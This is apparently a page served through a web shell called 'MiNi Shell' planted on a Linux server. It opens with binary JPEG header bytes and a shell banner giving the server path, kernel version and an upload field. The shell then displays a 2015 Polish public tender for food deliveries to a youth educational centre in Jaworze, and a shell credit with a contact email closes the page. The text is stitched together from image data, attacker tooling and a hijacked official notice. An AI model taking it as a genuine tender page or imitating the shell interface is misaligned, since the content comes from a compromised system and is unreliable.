JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151204/330936-N-2015.html

<p class="kh_header"><b>Jaworze: Zakup i dostawa pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych , ryb , mrożonek i jaj w 2016</b><br>
<b>Numer ogłoszenia: 330936 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Młodzieżowy Ośrodek Wychowawczy , ul. Pałacowa 1, 43-384 Jaworze, woj. śląskie, tel. 0-33 8172172, faks 0-33 8172172.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip:mowjaworze.edupage.org</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych , ryb , mrożonek i jaj w 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zakup i dostawa  pieczywa, nabiału,  mięsna  i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb,  mrożonek i jaj w roku 2016 
Część A - pieczywo ,Cześć B - nabiał, Cześć C - mięsno i przetwórstwo mięsne
Część D  - warzywa i owoce, Część E  - artykuły spożywcze
Część F -  ryby, Część G -  mrożonki , Część H - jaja.
Zakres zamówienia:
Część A - pieczywo 
                               
Lp.    
	Nazwa artykułu	Jedn. miary  	Ilość szacunkowa
1	Chleb krojony - 1 kg pszenny	szt.	4000
2	Chleb krojony - 0,5 kg Graham	szt.	3000
3	Bułka  pszenna 80 g	szt.	2160
4	Bułka graham 100g	szt.	6500
5	Bułka hotdog 80 G	szt.	3000
6	Rogal 100g	szt.	1500
7	Bułka - wek  350 g	szt.	15
8	Paluch drożdżowy pleciony 120 g	szt.	460
9	Bułka tarta	kg	100
10	Drożdże	kg	3

Część B -nabiał i przetwory mleczne 

L.p.     
	Nazwa artykułu	Jednostka miary  	Ilość
szacunkowa
1	Mleko 2   1 litr karton	szt.	5000
2	Masło 200 g  o zawartości 82  tłuszczu	szt.	3000
3	Margaryna śniadaniowa 500 g	szt.	300
4	Margaryna Palma  250 g	szt.	500
5	Śmietana 18  400 g	szt.	380
6	Jogurt naturalny 150 g	szt.	2500
7	Jogurt z owocami 150 g	szt.	2500
8	Kefir 200 g	szt.	400
9	Maślanka naturalna 1 l karton	szt.	150
10	Maślanka owocowa 1 l karton	szt.	350
11	Ser żółty twardy -  typu Salami	kg	200
12	Ser żółty twardy  -  typu Morski	kg	80
13	Twaróg półtłusty krajanka	kg	250
14	Serek homogenizowany 150 g	szt.	2400
15	Serek do chleba  śmietankowy 100 g 	szt.	600
16	Serek do chleba  z warzywami 100 g	szt.	250
17	Serek wiejski lekki 150 g	szt.	400
18	Serek topiony z dodatkami 100 g różne smaki	szt.	1000
19	Kluski na parze 200opx 6 szt. klusek	szt.	200

Część C -mięso i przetwory mięsne 

L.p.     
	Nazwa artykułu	Jednostka
miary  	Ilość szacunkowa
1	Schab zk	kg	250
2	Łopatka bk	kg	400
3	Karczek bk	kg	50
4	Udka z kurczaka	kg	270
5	Filet z kurczaka	kg	230
6	Skrzydełka drobiowe	kg	200
7	Mięso wołowe z  grubego na pieczeń, rolady	kg	15
8	Mięso wołowe - Rozbratel 	kg	30 
9	Żeberka wieprzowe paski	kg	50
10	Żeberka wędzone - mostek	Kg	20
11	Wątroba drobiowa	kg	40
12	Słonina wędzona	kg	35
13	Ogony wieprzowe	kg	50
14	Kiełbasa toruńska  nie mniej niż 70  mięsa wieprzowego	kg	300
15	Kiełbasa zwyczajna  nie mniej niż 70  mięsa wieprzowego	kg	100
16	Pasztetowa wieprzowa	kg	60
17	Pasztet pieczony	kg	30
18	Polędwica drobiowa nie mniej niż 70 procent mięsa drobiowego	kg	50
19	Kiełbasa kminkowa nie mniej niż 70 mięsa wieprzowego	kg	45
20	Kiełbasa szynkowa wp.  nie mniej niż 70 mięsa wieprzowego kg	60
21	Kiełbasa cienka z drobiu nie mniej niż 70 mięsa drobiowego	kg	100
22	Boczek wędzony bk	kg	70
23	Boczek rolowany faszerowany	kg	50
24	Kiełbasa biała  nie mniej niż 70 procent mięsa wieprzowego	kg	130
25	Parówka cielęca nie mniej niż 70  mięsa cielęcego	kg	280
26	Kiełbasa mortadela  nie mniej niż 70 mięsa wieprzowego kg	50
27	Baleron	kg	20
28	Ogonówka	kg	15
29	Szynka wieprzowa gotowana-wędzona	kg	200
30	Mielonka wieprzowa	kg	100
31	Pieczeń rzymska	kg	65
32	Kabanosy wieprzowe	kg	10
33	Krupniok  - kaszanka	kg	60
34	Kiełbasa śląska wieprzowa	kg	160
35	Kiełbasa żywiecka	kg	70
36	Salceson drobiowy	kg	20


Część D  -  Warzywa świeże   
L.p.     
	Nazwa artykułu	Jednostka miary  	Ilość szacunkowa
1	Burak czerwony	kg	160
2	Cebula 	kg	450
3	Cebula czerwona	kg	50
4	Ziemniak	kg	5200
5	Kapusta czerwona 	kg	100
6	Kapusta biała 	kg	380
7	Marchew	kg	300
8	Pietruszka	kg	120
9	Seler	kg	120
10	Pieczarka	kg	100
11	Por	kg	80
12	Czosnek główka	szt.	100
	Warzywa sezonowe od maja do	października	
1	Ogórek zielony	kg	130
2	Pomidor	kg	180
3	Kalafior	szt.	50
4	Kalarepa	kg	15
5	Pietruszka zielona 0,10 kg	pęcz	100
6	Sałata zielona 	szt.	18
7	Koperek zielony 0,10 kg	pęcz	80
8	Szczypiorek  0,10 kg	pęcz	60
9	Cebulka zielona 0,15 kg	pęcz	65
10	Kapusta pekińska całoroczna	kg	100
11	Rzodkiewka 0,25 kg	pęcz	150
12	Botwinka	kg	15
13	Papryka świeża	kg	30
14	Cukinia	kg	20
15	Fasola szparagowa	kg	15
16	Brokuły	Szt.	40
17	Sałata lodowa	Szt.	50
	Warzywa kiszone		
1	Kapusta kiszona	kg	250
2	Ogórek  kiszony	kg	180
3	Żurek 0,5 l	szt.	60
	Owoce		
1	Cytryna	kg	60
2	Pomarańcze 	kg	300
3	Mandarynki	kg	90
4	Kiwi 	kg	80
5	Banany 	kg	400
6	Rabarbar	kg	15
7	Truskawka	kg	36
8	Arbuz	kg	60
9	Jabłko	kg	600
10	Śliwki	kg	100
11	Gruszka	kg	60
12	Nektarynka 	kg	20
13	Brzoskwinia	kg	30

Część E - Artykuły Spożywcze  
L.p.     
	Nazwa artykułu	Jednostka miary  	Ilość szacunkowa 
1	Cukier op.1 kg	kg	250
2	Cukier puder	kg	55
3	Cukier waniliowy  32g	szt.	80
4	Kasza jęczmienna op.1kg	kg	40
5	Kasza manna op.1 kg	kg	35
6	Kasza pęczak op. 1 kg	kg	20
7	Kasza gryczana op. 1 kg	kg	20
8	Mąka wrocławska op.1 kg	kg	320
9	Mąka krupczatka op.1 kg	kg	30
10	Mąka ziemniaczana op.1 kg	kg	20
11	Mąka tortowa  op. 1 kg	kg	60
12	Ryż op. 1 kg	kg	160
13	Sól sodowo potasowa	kg	100
14	Płatki czekoladowe  1000g	szt.	50
15	Płatki  miodowe 1000g	szt.	50
16	Płatki owsiane op.500g	kg	50
17	Makaron gruby 500g świderki 	szt.	200
18	Makaron gruby 500 g ciemny	szt.	100
19	Makaron nitki 250 g 	szt.	200
20	Makaron ryżowy kształt 250g	szt.	100
21	Makaron spaghetti 500g 	szt.	30
22	Makaron spaghetti  ciemny 500g	szt.	30
23	Olej rzepakowy	l	500
24	Olej słonecznikowy	l	50
25	Liść laurowy    6g	szt.	40
26	Majeranek  15 g	szt.	80
27	Lubczyk 15 g	szt.	100
28	Ziele angielskie 15 g	szt.	35
29	Papryka mielona 20 g słodka	szt.	75
30	Papryka ostra mielona 20 g	szt.	20
31	Czosnek mielony 20 g	szt.	400
32	Pieprz mielony 20 g	szt.	440
33	Kminek 20 g	szt.	30
34	Kminek mielony  20 g	szt.	10
35	Oregano 10g	szt.	50
36	Bazylia 10 g	szt.	50
37	Tymianek 10 g	szt.	50
38	Carry 20g	szt.	15
39	Zioła prowansalskie 10g	szt.	50
40	Proszek do pieczenia 36g	szt.	35
41	Soda oczyszczona 50 g	szt.	30
42	Kisiel owocowy 79 g  bez cukru	szt.	900
43	Budyń 60 g bez cukru	szt.	600
44	Cynamon 20 g	szt.	30
45	Imbir w proszku 10 g	szt.	50
46	Gałka muszkatołowa  w proszku 10 g	szt.	20
47	Galaretka 80 g	szt.	10
48	Musztarda  180g b dod.glut.sodu bkon	szt.	500
49	Keczup 1000 g 120 g pomidorów w 100 g produktu bdod.glut.sodu bkon bbarw.szt.	300
50	Ocet 500 g 10	szt.	20
51	Herbata 100 g granulowana	szt.	300
52	Herbata miętowa w saszetkach 1 op.20 szt. 	szt.	50
53	Herbata owocowa w saszetkach 1 op.20 szt.	szt.	50
54	Kawa zbożowa 500 g	szt.	100
55	Kakao 100 g	szt.	100
56	Dżem owocowy 1 kg nisko słodzony b. gumy guary b barw. szt.	200
57	Dżem  różne smaki 280g niskosłodzony  b. gumy guary bbarw. szt.	200
58	Miód naturalny  380 g	szt.	600
59	Krem czekoladowy  orzechowy 350g 	szt.	100
60	Koncentrat pomidorowy 30% 900 g b dod.glut.sodu. b kon;bbarw.	szt.	115
61	Pomidory w puszce bez skóry  400 g	szt.	150
62	Sok owocowy 1 l  karton	szt.	200
63	Groszek konserwowy 400g	szt.	80
64	Kukurydza konserwowa 400 g	szt.	100
65	Fasolka konserwowa  czerwona  400g	szt.	50
66	Papryka konserwowa 870 g	szt.	120
67	Ogórek konserwowy 870 g	szt.	240
68	Fasola  Jaś 	kg	50
69	Fasola kolorowa	kg	20
70	Groch łuskany 	kg	25
71	Soczewica op.1 kg	kg	20
72	Pasztet drobiowy 130 g	szt.	1800
73	Ananas w puszce 565 g	szt.	2
74	Brzoskwinia w puszce 850 g	szt.	6
75	Rodzynki 100g	szt.	20
76	Wiórki kokosowe 100 g	szt.	6
77	Skórka pomarańczowa 100g	szt.	6
78	Przyprawa do piernika	szt.	20
79	Kwasek cytrynowy 10g	szt.	20
80	Ciastka- kruche do 10 g cukru w 100 g produktu	kg	200
81	Wody mineralne  niegazowane 1,5 l	szt.	800
82	Żelatyna 40g	szt.	5

Część F - ryby    
L.p.     
	Nazwa artykułu	Jednostka miary  	Ilość szacunkowa 
1	Filet z mintaja  bez glazury SHP	kg	300
2	Filet z dorsza bez glazury SHP	kg	80
3	Filet z morszczuka bez glazury SHP	kg	100
4	Matyjas solony 1 wiaderko 4 kg	szt.	15
5	Makrela wędzona 	kg	60
6	Konserwa  rybna -filet w oleju - 170 g	szt.	330
7	Konserwa rybna - filet  w pomidorach -170g	szt.	330
8	Konserwa rybna - szproty - 170g	sz.	200
9	Konserwa -paprykarz -330g	szt.	200
10	Konserwa - tuńczyk w oleju - kawałki-170g	szt.	500

Część  G - Mrożonki 

L.p.     
	Nazwa artykułu	Jednostka miary  	Ilość szacunkowa 
1	Mieszanka kompotowa	kg	380
2	Mieszanka warzywna zupa kg	80
3	Kalafior 	kg	50
4	Brokuły	Kg	30
5	Fasola szparagowa 	kg	50
6	Pierogi ruskie z serem	kg	100
7	Pierogi z serem	kg	50
8	Pyzy z mięsem	kg	100
9	Kluski śląskie 	kg	200
10	Kluski ze śliwkami	kg	80
11	Groszek mrożony	kg	25
12	Warzywa na patelnie	kg	50
13	Truskawka	kg	100
14	Uszka z kapustą i grzybami	kg	20
Część  H - jaja    

L.p.     
	Nazwa artykułu	Jednostka miary  	Ilość szacunkowa 
1	Jaja  Klasa XL	szt.	17000.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy z wykonawców ma obowiązek złożyć oświadczenie zgodnie z art.22 ust.1
 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy z wykonawców ma obowiązek złożyć oświadczenie zgodnie z art.22 ust.1
 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy z wykonawców ma obowiązek złożyć oświadczenie zgodnie z art.22 ust.1
 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy z wykonawców ma obowiązek złożyć oświadczenie zgodnie z art.22 ust.1
 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy z wykonawców ma obowiązek złożyć oświadczenie zgodnie z art.22 ust.1
 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca dołącza następujące dokumenty: 1) formularz ofertowy - załącznik 1 do siwz, 2) odpowiednie pełnomocnictwa - w sytuacjach określonych w rozdz.XI do siwa w przypadku składania ofert wspólnych, 3) oświadczenia o równoważności produktów wraz z opisem w przypadku składania ofert  równoważnych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mowjaworze.edupage.orag<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-384 Jaworze, ul. Pałacowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 09:00, miejsce: Dziennik podawczy , sekretariat Ośrodka pokój nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com